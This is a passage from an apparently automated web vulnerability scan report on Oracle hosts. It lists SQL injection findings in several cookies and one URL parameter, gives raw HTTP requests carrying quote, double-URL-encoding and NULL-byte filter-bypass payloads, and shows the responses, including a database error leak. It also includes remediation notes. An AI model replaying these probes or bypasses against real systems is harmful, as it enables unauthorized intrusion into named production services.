Cookie: s_wgw_lv=1315343380912%2527%2527; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 10:09:34 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=294;ecid=49401626258791188,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.23. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [gpw_e24 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/websites/crmoden/sitenavigationfunctions.js

Issue detail

The gpw_e24 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gpw_e24 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gpw_e24 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:26:49 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=49477385186977220,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527%2527; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:05:43 GMT
Last-Modified: Wed, 31 Aug 2011 01:05:02 GMT
ETag: "df7d6-2ffc-4abc2b7c52b80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=126;ecid=49405904046270069,0:1)
Content-Length: 12284

var g_httpCgiUrl = "/ocom/idcplg?IdcService=SS_GET_PAGE&";

/////////////////////////////////////////////////////////////////////////////
// Function : isTrue
// Comments :
//////////////////////
...[SNIP]...

1.24. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/websites/crmoden/sitenavigationfunctions.js

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%00'; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:45 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "10c00c-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=55;ecid=50158734503839384,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%00''; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:05:43 GMT
Last-Modified: Wed, 31 Aug 2011 01:05:02 GMT
ETag: "df7d6-2ffc-4abc2b7c52b80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=120;ecid=49405483139469326,0:1)
Content-Length: 12284

var g_httpCgiUrl = "/ocom/idcplg?IdcService=SS_GET_PAGE&";

/////////////////////////////////////////////////////////////////////////////
// Function : isTrue
// Comments :
//////////////////////
...[SNIP]...

1.25. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_nr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/websites/crmoden/sitenavigationfunctions.js

Issue detail

The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522%2527; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:49 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=27;ecid=49474640702841373,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522%2527%2527; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:59:06 GMT
Last-Modified: Wed, 31 Aug 2011 01:05:02 GMT
ETag: "df7d6-2ffc-4abc2b7c52b80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=30;ecid=49938570185253534,0:1)
Content-Length: 12284

var g_httpCgiUrl = "/ocom/idcplg?IdcService=SS_GET_PAGE&";

/////////////////////////////////////////////////////////////////////////////
// Function : isTrue
// Comments :
//////////////////////
...[SNIP]...

1.26. https://irecruitment.oracle.com/OA_HTML/OA.jsp [GSI cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/OA.jsp

Issue detail

The GSI cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the GSI cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C'; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 643
Date: Mon, 17 Oct 2011 12:28:14 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OAErrorPage.jsp

&#60;PRE&#62;Oracle error 6502: java.sql.SQLException: ORA-06502: PL/SQL: numeric or value error: hex to raw conversion error
ORA-06512: at &#38;#34&#59;APPS.ICX_CALL&#38;#34&#59;, line 1181
ORA-01722: invalid number
ORA-06512: at &#38;#34&#59;APPS.FND_SESSION_
...[SNIP]...

1.27. https://shop.oracle.com/pls/ostore/f [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pls/ostore/f?p=dstore:6:7881107130450135::NO:RP,6:P6_LPI:4508925239811805719874' HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:home:7881107130450135&tz=-5:00
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_cc=true; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Ahome%253A7881107130450135%2526tz%253D-5%253A00%7C1318855646397%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Ahome%253A7881107130450135%2526tz%253D-5%253A00%7C1318855646399%3B; 